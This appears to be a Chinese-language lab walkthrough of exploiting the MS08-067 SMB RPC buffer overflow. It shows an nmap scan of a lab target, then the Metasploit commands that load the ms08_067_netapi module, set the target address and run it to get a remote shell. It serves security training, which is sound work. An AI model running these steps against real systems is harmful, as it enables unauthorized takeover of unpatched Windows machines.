一、漏洞原理简介
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
二、漏洞发现
扫描靶机版本开启的服务
nmap -sV 172.16.1.25
![](https://img-blog.csdnimg.cn/img_convert/1499ccefbeb04b3694369ad7a2901ff7.png)
发现靶机开启了445端口,ms08-067漏洞利用的是445端口中的SMB服务
三、利用漏洞
1、打开kali中msfconsole漏洞测试平台
![](https://img-blog.csdnimg.cn/img_convert/2f98220974b5434185d4fd4eba000151.png)
1、搜索ms08-067漏洞利用模块
search ms08-067
![](https://img-blog.csdnimg.cn/img_convert/79ff8da6770040b784af0a64f9f0198f.png)
2、使用漏洞攻击模块
use exploit/windows/smb/ms08_067_netapi
![](https://img-blog.csdnimg.cn/img_convert/3890700be3b24bbd949809c9ae5457ff.png)
3、查看该模块需要配置的参数
show options
![](https://img-blog.csdnimg.cn/img_convert/e90a487a56384d35b90195bd6db9c140.png)
4、设置目标靶机IP
set RHOST 172.16.1.25
![](https://img-blog.csdnimg.cn/img_convert/7c39f0b7a24b40908179e7c8a59f36e1.png)
5、运行攻击模块
run
![](https://img-blog.csdnimg.cn/img_convert/1ccea04ffcf04a9c8ed5de0294694478.png)
![](https://img-blog.csdnimg.cn/img_convert/a4c6d815f6df46c6907d0fefa97acaf6.png)
利用成功,成功拿到靶机shell
6、查看信息
我们可以通过此漏洞拿到我们想要的信息及远程控制
![](https://img-blog.csdnimg.cn/img_convert/882455b6a60d4557b4860a452867b651.png)
利用完成,实验结束